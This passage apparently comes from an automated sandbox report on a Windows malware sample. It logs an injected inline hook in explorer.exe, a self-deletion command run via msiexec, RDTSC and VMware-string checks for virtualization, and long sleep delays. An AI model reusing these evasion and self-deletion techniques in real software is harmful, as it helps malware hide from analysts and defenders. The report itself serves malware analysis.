          Source: Binary string: wntdll.pdbUGP source: nji3Lg1ot6.exe, 00000000.00000003.294014026.0000000003090000.00000004.00000001.sdmp, nji3Lg1ot6.exe, 00000000.00000003.290725743.0000000003220000.00000004.00000001.sdmp, nji3Lg1ot6.exe, 00000001.00000002.345001948.0000000000A00000.00000040.00000001.sdmp, nji3Lg1ot6.exe, 00000001.00000002.345127293.0000000000B1F000.00000040.00000001.sdmp, msiexec.exe, 00000007.00000002.562611430.0000000004680000.00000040.00000001.sdmp, msiexec.exe, 00000007.00000002.562834721.000000000479F000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: nji3Lg1ot6.exe, nji3Lg1ot6.exe, 00000001.00000002.345001948.0000000000A00000.00000040.00000001.sdmp, nji3Lg1ot6.exe, 00000001.00000002.345127293.0000000000B1F000.00000040.00000001.sdmp, msiexec.exe, msiexec.exe, 00000007.00000002.562611430.0000000004680000.00000040.00000001.sdmp, msiexec.exe, 00000007.00000002.562834721.000000000479F000.00000040.00000001.sdmp
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 0_2_72FB1000 push eax; ret 0_2_72FB102E
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_0041E9E6 push edx; ret 1_2_0041E9EE
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00416B6D push ebx; ret 1_2_00416B85
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_0041D4F2 push eax; ret 1_2_0041D4F8
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_0041D4FB push eax; ret 1_2_0041D562
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_0041D4A5 push eax; ret 1_2_0041D4F8
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_0041D55C push eax; ret 1_2_0041D562
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_0041EEB5 push esi; ret 1_2_0041F0D9
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A7D0D1 push ecx; ret 1_2_00A7D0E4
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046FD0D1 push ecx; ret 7_2_046FD0E4
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_006DE9E6 push edx; ret 7_2_006DE9EE
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_006D6B6D push ebx; ret 7_2_006D6B85
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_006DD4FB push eax; ret 7_2_006DD562
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_006DD4F2 push eax; ret 7_2_006DD4F8
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_006DD4A5 push eax; ret 7_2_006DD4F8
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_006DD55C push eax; ret 7_2_006DD562
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_006DEEB5 push esi; ret 7_2_006DF0D9
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 0_2_00405DA3 GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_00405DA3
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeFile created: C:\Users\user\AppData\Local\Temp\nsx7FAF.tmp\mtmmtvzho.dll

          Hooking and other Techniques for Hiding and Protection:

          Modifies the prolog of user mode functions (user mode inline hooks)
          Source: explorer.exeUser mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x85 0x5E 0xE0
          Self deletion via cmd delete
          Source: C:\Windows\SysWOW64\msiexec.exeProcess created: /c del "C:\Users\user\Desktop\nji3Lg1ot6.exe"
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          Tries to detect virtualization through RDTSC time measurements
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeRDTSC instruction interceptor: First address: 0000000000409904 second address: 000000000040990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeRDTSC instruction interceptor: First address: 0000000000409B6E second address: 0000000000409B74 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\explorer.exe TID: 6788Thread sleep time: -56000s >= -30000s
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 6720Thread sleep time: -46000s >= -30000s
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\msiexec.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00409AA0 rdtsc 1_2_00409AA0
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeAPI coverage: 7.9 %
          Source: C:\Windows\SysWOW64\msiexec.exeAPI coverage: 7.4 %
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeProcess information queried: ProcessInformation
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 0_2_00405D7C FindFirstFileA,FindClose,0_2_00405D7C
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 0_2_004053AA CloseHandle,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,0_2_004053AA
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 0_2_00402630 FindFirstFileA,0_2_00402630
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeAPI call chain: ExitProcess graph end nodegraph_0-3606
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeAPI call chain: ExitProcess graph end nodegraph_0-3610
          Source: explorer.exe, 00000003.00000000.330096852.00000000086C9000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000003.00000000.303384073.0000000008778000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000}
          Source: explorer.exe, 00000003.00000000.327963401.00000000067C2000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000003.00000000.330096852.00000000086C9000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}&
          Source: explorer.exe, 00000003.00000000.327963401.00000000067C2000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000m32)
          Source: explorer.exe, 00000003.00000000.330096852.00000000086C9000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeProcess token adjusted: Debug
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 0_2_0019EB1E mov eax, dword ptr fs:[00000030h]0_2_0019EB1E
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 0_2_0019E90A mov eax, dword ptr fs:[00000030h]0_2_0019E90A
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 0_2_0019EC4C mov eax, dword ptr fs:[00000030h]0_2_0019EC4C
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 0_2_0019EBCF mov eax, dword ptr fs:[00000030h]0_2_0019EBCF
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 0_2_0019EC0E mov eax, dword ptr fs:[00000030h]0_2_0019EC0E
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A520A0 mov eax, dword ptr fs:[00000030h]1_2_00A520A0
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A690AF mov eax, dword ptr fs:[00000030h]1_2_00A690AF
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A5F0BF mov ecx, dword ptr fs:[00000030h]1_2_00A5F0BF
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A5F0BF mov eax, dword ptr fs:[00000030h]1_2_00A5F0BF
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A29080 mov eax, dword ptr fs:[00000030h]1_2_00A29080
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00AA3884 mov eax, dword ptr fs:[00000030h]1_2_00AA3884
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A4B8E4 mov eax, dword ptr fs:[00000030h]1_2_00A4B8E4
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A240E1 mov eax, dword ptr fs:[00000030h]1_2_00A240E1
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A258EC mov eax, dword ptr fs:[00000030h]1_2_00A258EC
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00ABB8D0 mov eax, dword ptr fs:[00000030h]1_2_00ABB8D0
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00ABB8D0 mov ecx, dword ptr fs:[00000030h]1_2_00ABB8D0
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A5002D mov eax, dword ptr fs:[00000030h]1_2_00A5002D
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A3B02A mov eax, dword ptr fs:[00000030h]1_2_00A3B02A
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A4A830 mov eax, dword ptr fs:[00000030h]1_2_00A4A830
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00AF4015 mov eax, dword ptr fs:[00000030h]1_2_00AF4015
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00AA7016 mov eax, dword ptr fs:[00000030h]1_2_00AA7016
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00AF1074 mov eax, dword ptr fs:[00000030h]1_2_00AF1074
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00AE2073 mov eax, dword ptr fs:[00000030h]1_2_00AE2073
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A40050 mov eax, dword ptr fs:[00000030h]1_2_00A40050
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A561A0 mov eax, dword ptr fs:[00000030h]1_2_00A561A0
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00AE49A4 mov eax, dword ptr fs:[00000030h]1_2_00AE49A4
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00AA69A6 mov eax, dword ptr fs:[00000030h]1_2_00AA69A6
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00AA51BE mov eax, dword ptr fs:[00000030h]1_2_00AA51BE
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A499BF mov ecx, dword ptr fs:[00000030h]1_2_00A499BF
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A499BF mov eax, dword ptr fs:[00000030h]1_2_00A499BF
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A5A185 mov eax, dword ptr fs:[00000030h]1_2_00A5A185
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A4C182 mov eax, dword ptr fs:[00000030h]1_2_00A4C182
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A52990 mov eax, dword ptr fs:[00000030h]1_2_00A52990
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A2B1E1 mov eax, dword ptr fs:[00000030h]1_2_00A2B1E1
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00AB41E8 mov eax, dword ptr fs:[00000030h]1_2_00AB41E8
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A44120 mov eax, dword ptr fs:[00000030h]1_2_00A44120
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A44120 mov ecx, dword ptr fs:[00000030h]1_2_00A44120
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A5513A mov eax, dword ptr fs:[00000030h]1_2_00A5513A
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A29100 mov eax, dword ptr fs:[00000030h]1_2_00A29100
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A2C962 mov eax, dword ptr fs:[00000030h]1_2_00A2C962
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A2B171 mov eax, dword ptr fs:[00000030h]1_2_00A2B171
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A4B944 mov eax, dword ptr fs:[00000030h]1_2_00A4B944
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A252A5 mov eax, dword ptr fs:[00000030h]1_2_00A252A5
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A3AAB0 mov eax, dword ptr fs:[00000030h]1_2_00A3AAB0
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A5FAB0 mov eax, dword ptr fs:[00000030h]1_2_00A5FAB0
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A5D294 mov eax, dword ptr fs:[00000030h]1_2_00A5D294
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A52AE4 mov eax, dword ptr fs:[00000030h]1_2_00A52AE4
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A52ACB mov eax, dword ptr fs:[00000030h]1_2_00A52ACB
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A64A2C mov eax, dword ptr fs:[00000030h]1_2_00A64A2C
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A64A2C mov eax, dword ptr fs:[00000030h]1_2_00A64A2C
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A4A229 mov eax, dword ptr fs:[00000030h]1_2_00A4A229
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A4A229 mov eax, dword ptr fs:[00000030h]1_2_00A4A229
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A4A229 mov eax, dword ptr fs:[00000030h]1_2_00A4A229
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A4A229 mov eax, dword ptr fs:[00000030h]1_2_00A4A229
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A4A229 mov eax, dword ptr fs:[00000030h]1_2_00A4A229
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A4A229 mov eax, dword ptr fs:[00000030h]1_2_00A4A229
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A4A229 mov eax, dword ptr fs:[00000030h]1_2_00A4A229
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A4A229 mov eax, dword ptr fs:[00000030h]1_2_00A4A229
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A4A229 mov eax, dword ptr fs:[00000030h]1_2_00A4A229
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A38A0A mov eax, dword ptr fs:[00000030h]1_2_00A38A0A
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A25210 mov eax, dword ptr fs:[00000030h]1_2_00A25210
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A25210 mov ecx, dword ptr fs:[00000030h]1_2_00A25210
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A25210 mov eax, dword ptr fs:[00000030h]1_2_00A25210
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A25210 mov eax, dword ptr fs:[00000030h]1_2_00A25210
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A2AA16 mov eax, dword ptr fs:[00000030h]1_2_00A2AA16
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A2AA16 mov eax, dword ptr fs:[00000030h]1_2_00A2AA16
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A43A1C mov eax, dword ptr fs:[00000030h]1_2_00A43A1C
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00AEAA16 mov eax, dword ptr fs:[00000030h]1_2_00AEAA16
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00AEAA16 mov eax, dword ptr fs:[00000030h]1_2_00AEAA16
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00ADB260 mov eax, dword ptr fs:[00000030h]1_2_00ADB260
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00ADB260 mov eax, dword ptr fs:[00000030h]1_2_00ADB260
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00AF8A62 mov eax, dword ptr fs:[00000030h]1_2_00AF8A62
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A6927A mov eax, dword ptr fs:[00000030h]1_2_00A6927A
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A29240 mov eax, dword ptr fs:[00000030h]1_2_00A29240
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A29240 mov eax, dword ptr fs:[00000030h]1_2_00A29240
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A29240 mov eax, dword ptr fs:[00000030h]1_2_00A29240
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A29240 mov eax, dword ptr fs:[00000030h]1_2_00A29240
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00AEEA55 mov eax, dword ptr fs:[00000030h]1_2_00AEEA55
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00AB4257 mov eax, dword ptr fs:[00000030h]1_2_00AB4257
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A54BAD mov eax, dword ptr fs:[00000030h]1_2_00A54BAD
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A54BAD mov eax, dword ptr fs:[00000030h]1_2_00A54BAD
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A54BAD mov eax, dword ptr fs:[00000030h]1_2_00A54BAD
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00AF5BA5 mov eax, dword ptr fs:[00000030h]1_2_00AF5BA5
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00AE138A mov eax, dword ptr fs:[00000030h]1_2_00AE138A
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A31B8F mov eax, dword ptr fs:[00000030h]1_2_00A31B8F
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A31B8F mov eax, dword ptr fs:[00000030h]1_2_00A31B8F
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00ADD380 mov ecx, dword ptr fs:[00000030h]1_2_00ADD380
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A52397 mov eax, dword ptr fs:[00000030h]1_2_00A52397
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A5B390 mov eax, dword ptr fs:[00000030h]1_2_00A5B390
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A503E2 mov eax, dword ptr fs:[00000030h]1_2_00A503E2
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A503E2 mov eax, dword ptr fs:[00000030h]1_2_00A503E2
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A503E2 mov eax, dword ptr fs:[00000030h]1_2_00A503E2
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A503E2 mov eax, dword ptr fs:[00000030h]1_2_00A503E2
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A503E2 mov eax, dword ptr fs:[00000030h]1_2_00A503E2
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A503E2 mov eax, dword ptr fs:[00000030h]1_2_00A503E2
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A4DBE9 mov eax, dword ptr fs:[00000030h]1_2_00A4DBE9
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00AA53CA mov eax, dword ptr fs:[00000030h]1_2_00AA53CA
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00AA53CA mov eax, dword ptr fs:[00000030h]1_2_00AA53CA
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00AE131B mov eax, dword ptr fs:[00000030h]1_2_00AE131B
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A2DB60 mov ecx, dword ptr fs:[00000030h]1_2_00A2DB60
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A53B7A mov eax, dword ptr fs:[00000030h]1_2_00A53B7A
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A53B7A mov eax, dword ptr fs:[00000030h]1_2_00A53B7A
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A2DB40 mov eax, dword ptr fs:[00000030h]1_2_00A2DB40
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00AF8B58 mov eax, dword ptr fs:[00000030h]1_2_00AF8B58
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A2F358 mov eax, dword ptr fs:[00000030h]1_2_00A2F358
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A3849B mov eax, dword ptr fs:[00000030h]1_2_00A3849B
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00AE14FB mov eax, dword ptr fs:[00000030h]1_2_00AE14FB
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00AA6CF0 mov eax, dword ptr fs:[00000030h]1_2_00AA6CF0
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00AA6CF0 mov eax, dword ptr fs:[00000030h]1_2_00AA6CF0
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00AA6CF0 mov eax, dword ptr fs:[00000030h]1_2_00AA6CF0
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00AF8CD6 mov eax, dword ptr fs:[00000030h]1_2_00AF8CD6
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A5BC2C mov eax, dword ptr fs:[00000030h]1_2_00A5BC2C
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00AA6C0A mov eax, dword ptr fs:[00000030h]1_2_00AA6C0A
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00AA6C0A mov eax, dword ptr fs:[00000030h]1_2_00AA6C0A
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00AA6C0A mov eax, dword ptr fs:[00000030h]1_2_00AA6C0A
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00AA6C0A mov eax, dword ptr fs:[00000030h]1_2_00AA6C0A
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00AF740D mov eax, dword ptr fs:[00000030h]1_2_00AF740D
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00AF740D mov eax, dword ptr fs:[00000030h]1_2_00AF740D
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00AF740D mov eax, dword ptr fs:[00000030h]1_2_00AF740D
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00AE1C06 mov eax, dword ptr fs:[00000030h]1_2_00AE1C06
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00AE1C06 mov eax, dword ptr fs:[00000030h]1_2_00AE1C06
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00AE1C06 mov eax, dword ptr fs:[00000030h]1_2_00AE1C06
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00AE1C06 mov eax, dword ptr fs:[00000030h]1_2_00AE1C06
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00AE1C06 mov eax, dword ptr fs:[00000030h]1_2_00AE1C06
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00AE1C06 mov eax, dword ptr fs:[00000030h]1_2_00AE1C06
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00AE1C06 mov eax, dword ptr fs:[00000030h]1_2_00AE1C06
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00AE1C06 mov eax, dword ptr fs:[00000030h]1_2_00AE1C06
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00AE1C06 mov eax, dword ptr fs:[00000030h]1_2_00AE1C06
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00AE1C06 mov eax, dword ptr fs:[00000030h]1_2_00AE1C06
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00AE1C06 mov eax, dword ptr fs:[00000030h]1_2_00AE1C06
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00AE1C06 mov eax, dword ptr fs:[00000030h]1_2_00AE1C06
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00AE1C06 mov eax, dword ptr fs:[00000030h]1_2_00AE1C06
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00AE1C06 mov eax, dword ptr fs:[00000030h]1_2_00AE1C06
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A4746D mov eax, dword ptr fs:[00000030h]1_2_00A4746D
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A5A44B mov eax, dword ptr fs:[00000030h]1_2_00A5A44B
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00ABC450 mov eax, dword ptr fs:[00000030h]1_2_00ABC450
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00ABC450 mov eax, dword ptr fs:[00000030h]1_2_00ABC450
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00AF05AC mov eax, dword ptr fs:[00000030h]1_2_00AF05AC
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00AF05AC mov eax, dword ptr fs:[00000030h]1_2_00AF05AC
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A535A1 mov eax, dword ptr fs:[00000030h]1_2_00A535A1
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A51DB5 mov eax, dword ptr fs:[00000030h]1_2_00A51DB5
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A51DB5 mov eax, dword ptr fs:[00000030h]1_2_00A51DB5
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A51DB5 mov eax, dword ptr fs:[00000030h]1_2_00A51DB5
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A52581 mov eax, dword ptr fs:[00000030h]1_2_00A52581
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A52581 mov eax, dword ptr fs:[00000030h]1_2_00A52581
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A52581 mov eax, dword ptr fs:[00000030h]1_2_00A52581
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A52581 mov eax, dword ptr fs:[00000030h]1_2_00A52581
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A22D8A mov eax, dword ptr fs:[00000030h]1_2_00A22D8A
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A22D8A mov eax, dword ptr fs:[00000030h]1_2_00A22D8A
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A22D8A mov eax, dword ptr fs:[00000030h]1_2_00A22D8A
